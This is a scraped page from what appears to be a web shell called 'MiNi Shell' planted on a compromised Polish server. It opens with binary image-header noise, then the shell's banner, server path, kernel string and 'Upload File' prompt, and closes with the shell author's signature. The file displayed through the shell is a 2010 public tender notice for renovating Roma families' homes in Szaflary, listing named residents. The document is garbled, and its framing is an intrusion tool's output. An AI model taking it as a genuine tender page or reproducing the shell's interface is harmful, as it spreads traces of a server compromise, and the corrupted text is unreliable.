JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100901/236961-N-2010.html

<p class="kh_header"><b>Szaflary: Prace remontowo-budowlane budynków mieszkalnych Romów na oś. Zadział w Gminie Szaflary</b><br>
<b>Numer ogłoszenia: 236961 - 2010; data zamieszczenia: 01.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Szaflarach , ul. Zakopiańska 18, 34-424 Szaflary, woj. małopolskie, tel. 18 2612329, faks 18 2612329.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops-szaflary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Jednostka Organizacyjna..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace remontowo-budowlane budynków mieszkalnych Romów na oś. Zadział w Gminie Szaflary.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakres przedmiotu zamówienia wchodzi wykonanie
następujących prac remontowo-budowlanych:

Uwagi wstępne:
1. Ze względu na stan techniczny budynków, zaleca się, aby każdy oferent dokonał oględzin planowanych robót w miejscu ich realizacji celem rzetelnej wyceny ofertowej.
2. Zamawiający zastrzega sobie pomniejszenie zakresu robót w przypadku, gdy cena ofertowa przekroczy wysokość środków finansowych, jakimi dysponuje, jak również rezygnację z niektórych robót i zlecenie robót zamiennych lub dodatkowych, uzasadnionych ze względów technologicznych i finansowych.

I. Zadział  2 - Helena Gil:
1.Wykonanie elewacji na ścianach drewnianych (płazach), z paneli winylowych typu Siding wraz z ociepleniem wełną mineralną, izolacją wiatrową i wilgociową oraz niezbędnymi obróbkami. Demontaż i montaż osprzętu elektrycznego na elewacji.
2.Uzupełnienie i wyrównanie ławy betonowej.
3.Demontaż i wykonanie nowego wiatrołapu drewnianego na stopach betonowych wraz ze schodami i podestem, oraz wbudowaniem okna w jego ścianę.
4.Wymiana pokrycia dachowego z dachówki ceramicznej na blachę trapezową, powlekaną wraz z niezbędnymi obróbkami i wykończeniem okapów.
5.Budowa komina dwukanałowego z kształtek betonowych wewnątrz budynku po uprzednim wykonaniu stopy fundamentowej wraz z niezbędnym wykończeniem 
i podłączeniem pieca kuchennego przenośnego.
6.Demontaż istniejącej posadzki i wykonanie nowej z izolacją przeciwwilgociową, ociepleniem styropianem i wylewką betonową, oraz wykonanie podłogi z desek.
7.Ocieplenie stropu od góry wełną mineralną wraz z izolacją przeciwwilgociową.

II. Zadział 1 - Łukasz Wil.
1.Demontaż i wykonanie nowego wiatrołapu drewnianego na stopach betonowych wraz ze schodami i podestem, oraz przebudową fragmentu dachu. Wymiana pokrycia dachowego wiatrołapu i fragmentu dachu budynku wraz z niezbędnymi obróbkami i odwodnieniem (rynny i rury spustowe).
2.Ocieplenie stropu od góry wełną mineralną wraz z izolacją przeciwwilgociową.
3.Wykonanie przyłącza energetycznego napowietrznego z budynku obok na podlicznik wraz z niezbędnym oprzyrządowaniem i zabezpieczeniami. Oświetlenie zewnętrzne - 1 lampa nad wejściem. Instalacja wewnętrzna - 2 gniazda, lampa sufitowa i włącznik w kuchni i pokoju.
4.Wykończenie pomieszczenia murowanego (kuchni) - zamurowanie otworu okiennego, wymiana drzwi zewnętrznych, montaż parapetu drewnianego, tynk cementowo-wapienny, posadzka betonowa na styropianie wraz z płytkami ceramicznymi (posadzka i cokół), malowanie emulsyjne.
5.Budowa komina dwukanałowego z kształtek betonowych w pokoju po uprzednim wykonaniu stopy fundamentowej wraz z niezbędnym wykończeniem i podłączeniem pieca kuchennego przenośnego.
6.Demontaż obicia styropianowego ścian i montaż płyt g-k wodoodpornych na ruszcie. Montaż parapetu.
7.Wymiana posadzki na wykładzinę  rulonową - winyleum, z w obrębie komina płytki ceramiczne.
8.Malowanie emulsyjne ścian i sufitu.

III. Zadział 2a - Krzysztof i Nina Gil.
1.Zamurowanie otworów w ścianach i wykonanie nadproży żelbetowych.
2.Wykonanie pokrycia dachowego z blachy trapezowej na gotowej więźbie dachowej wraz z wiatroizolacją i niezbędnymi obróbkami blacharskimi i wykończeniem okapów, oraz odwodnieniem dachu.
3.Demontaż i montaż opraw żarowych i osprzętu elektrycznego.
4.Rozebranie obicia ścian z płyt g-k i wykonanie nowego obicia z płyt g-k wodoodpornych na nowym ruszcie.
5.Demontaż istniejącej posadzki i wykonanie nowej wylewki betonowej na styropianie, ułożenie płytek ceramicznych wraz z cokołem.
6.Wymiana drzwi zewnętrznych i wykonanie niezbędnych obróbek. Montaż parapetu.
7.Malowanie ścian i sufitów kuchni i pokoju.
8.Wykonanie wentylacji grawitacyjnej, pionowej w kuchni z kształtek wentylacyjnych.

IV. Zadział 2a - Krystyna Gil.
1.Wymiana dwóch drzwi wewnętrznych wraz z wykonaniem niezbędnych obróbek.
2.Wykonanie wylewek betonowych i wykonanie posadzki z płytek ceramicznych.
3.Wykonanie okładziny ściennej z płytek ceramicznych.

V. Zadział 3 - Mieczysław i Zenobia Gil.
1.Wykończenie łazienki o konstrukcji drewnianej - demontaż i montaż osprzętu elektrycznego, rozprowadzenie rur wodnych i wykonanie podejść pod prysznic, umywalkę, WC, montaż baterii, wylewka betonowa, ocieplenie ścian wełną mineralną, okładziny ścienne i sufitowe z płyt g-k wodoodpornych na ruszcie, posadzka z płytek ceramicznych i okładziny ścienne z płytek ceramicznych, malowanie emulsyjne fragmentu ścian i sufitu, niezbędne obróbki.
2.Posadzka z paneli podłogowych wraz z listwami.
3.Uzupełnienie obicia z płyt g-k zwykłych na ruszcie, szpachlowanie i malowanie.

VI. Zadział 6 - Zbigniew i Żaneta Donga.
1.Wykończenie łazienki murowanej - demontaż i montaż wyposażenia łazienkowego, rozprowadzenie rur wodnych i wykonanie podejść pod wannę, umywalkę, WC, pralkę, montaż baterii, wylewka betonowa na styropianie, posadzka z płytek ceramicznych i okładziny ścienne z płytek ceramicznych, malowanie emulsyjne fragmentu ścian i sufitu, niezbędne obróbki.
2.Demontaż istniejącej posadzki z linoleum oraz wylewki betonowej i wykonanie nowej wylewki betonowej na styropianie, wykonanie posadzki z płytek ceramicznych wraz z cokołem. 
3.Wykonanie wentylacji grawitacyjnej, pionowej w kuchni z kształtek wentylacyjnych.
4.Wykończenie przedpokoju listwami boazeryjnymi na ruszcie wraz z niezbędnymi obróbkami - listwy właściciela budynku do wykorzystania, pozostałe dostarczy wykonawca. Lakierowanie boazerii.
5.Montaż podłogi z desek w wiatrołapie i malowanie olejne podłogi.

VII. Zadział 9 - Antonina Gil.
1.Demontaż i wykonanie nowego wiatrołapu drewnianego na stopach betonowych wraz ze schodami i podestem, oraz wbudowaniem okna w jego ścianę. Malowanie olejne wiatrołapu.
2.Demontaż podłóg drewnianych w dwóch pomieszczeniach.
3.Wykonanie nowych podłóg drewnianych na legarach wraz z izolacją przeciwwilgociową i termoizolacją z płyt styropianowych. Cyklinowanie i lakierowanie podłóg.
4.Wymiana progów drzwiowych.
5.Wykonanie opaski okiennej z desek profilowanych.
6.Wykonanie przyłącza wodociągowego - wykop wąskoprzestrzenny, podsypka piaskowa, rurociąg z rur PE z wpięciem do magistrali głównej, przebicie fundamentu, przeprowadzenie rurociągu przez posadzkę, montaż baterii/kranu, ocieplenie rury 
na odcinku grunt-posadzka, zasypanie wykopu i plantowanie terenu po robotach.

VIII. Zadział 7 - Magdalena Mirga. 
1.Wymiana zapadniętego stropu - demontaż i montaż lampy sufitowej, stemplowanie nadproży i stropu, rozebranie sufitu, rozebranie zasypki stropowej, rozebranie belek stropowych, ślepego pułapu z desek, montaż belek stropowych, ślepego pułapu z płyt wiórowych-prasowanych, montaż okładziny z płyt g-k na suficie na ruszcie, malowanie emulsyjne, montaż listew maskujących przy suficie, ocieplenie stropu od góry wełną mineralną wraz z izolacją przeciwwilgociową.
2.Wymiana drzwi wewnętrznych wraz z niezbędnymi obróbkami.

IX. Zadział 7 - Elwira Donga.
1.Wykonanie wylewki betonowej na styropianie wraz z izolacją przeciwwilgociową.
2.Uzupełnienie ubytków ścian drewnianych poprzez wykonanie szkieletu drewnianego, wypełnienie wełną mineralną i obicie płytami g-k wodoodpornymi.
3.Ocieplenie ścian drewnianych wełną mineralną oraz obicie płytami g-k  wodoodpornymi na ruszcie i szalówką na fragmencie.
4.Wykonanie drzwiczek drewnianych.
5.Wzmocnienie stropu drewnianego przedpokoju poprzez wstawienie dodatkowych belek stropowych.
6.Wzmocnienie podestu schodów poprzez wstawienie dodatkowych belek stropowych.
7.Uzupełnienie na ścianie płyt g-k zwykłych i podłogi panelowej w pokoju.
8.Malowanie emulsyjne płyt g-k.

X. Zadział 10a - Daniel Gil.
1.Wykończenie łazienki - demontaż i montaż wyposażenia łazienkowego i osprzętu elektrycznego, wylewka betonowa wyrównawcza, okładziny ścienne i sufitowe z płyt g-k wodoodpornych na ruszcie, posadzka z płytek ceramicznych i okładziny ścienne z płytek ceramicznych, malowanie emulsyjne fragmentu ścian i sufitu, niezbędne obróbki.

XI.  Zadział  10b - Edyta Gil.
1.Wykończenie przybudówki drewnianej - demontaż okna, wzmocnienie szkieletu drewnianego ścian i stropu dodatkowymi elementami drewnianymi, demontaż podłogi i wykonanie nowej wraz z ocieploną posadzką betonową na styropianie, wykonanie ślepej podłogi z płyt wiórowych-prasowanych, posadzka z paneli, okładzina ścienna i sufitowa z płyt g-k wodoodpornych na ruszcie, malowanie emulsyjne płyt i tynku cem-wap., montaż parapetu, wypełnienie szkieletu ścian wełną mineralną, ocieplenie stropu wełną mineralną, wykonanie elewacji z paneli winylowych typu Siding, wykonanie ścianki działowej z płyt g-k wodoodpornych, wbudowanie drzwi wewnętrznych w ściankę, wykonanie murku oporowego betonowego pomiędzy stopami, szalowanie okapów, uzupełnienie pokrycia dachowego-wykonanie niezbędnych obróbek blacharskich, uzupełnienie rynien i rur spustowych.
2.Remont komina na zewnątrz - rozbiórka komina (1,5m), odtworzenie komina (2mb), wykonanie otworu i montaż drzwiczek wyciorowych, wykonanie czapki betonowej, tynkowanie komina, montaż czopucha piecowego do komina.
3.Przeprowadzenie instalacji wodnej przez ścianę lekką do pomieszczenia kuchennego i zamontowanie kranu.

XII. Zadział 12 - Renata Gil.
1.Rozebranie posadzek i wykonanie nowych wylewek betonowych na styropianie. Wykonanie posadzki panelowej w pokoju i posadzki z płytek ceramicznych z cokołem w kuchni.
2.Demontaż i montaż lampy sufitowej.
3.Malowanie ścian i sufitów po uprzednim przygotowaniu podłoża.
4.Wykonanie podejścia dopływowego do baterii zlewu z rur znajdujących się tuż pod zlewem.
5.Wykonanie okładziny ściennej z płyt g-k wodoodpornej na ścianie z wyposażeniem kuchennym, licowanie fragmentu tej ściany płytkami ceramicznymi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda  wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisane oświadczenie - załącznik nr 3 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy dostawy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. /według załącznika nr 7 do siwz/</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także informacje o zakresie wykonywanych przez nich czynności, oraz informacji o podstawie dysponowania tymi osobami, /według załącznika nr 4 do siwz/</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisane oświadczenie - załącznik nr 3 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy, stanowiący załącznik nr 1 do siwz,
- kosztorys ofertowy uproszczony</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w następujących okolicznościach :
a)zaistnienie, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy, 
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu,
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności :powódź, pożar, i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamanie warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
b)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
c)powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
d)zmiany lub innej istotnej zmiany w ilości jakiegokolwiek elementu prac objętych umową (dotyczy to kontraktów obmiarowych, przewidujących wynagrodzenie kosztorysowe);
e)wystąpienie istotnych wad dokumentacji projektowej, skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji - zmianie ulegnie odpowiednio termin realizacji zamówienia;
f)zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji umowy oraz terminy wynikające z harmonogramu;
g)gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops-szaflary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej
ul. Zakopiańska 18 
34-424 Szaflary
pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2010 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej
ul. Zakopiańska 18
34 - 424 Szaflary,
Pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com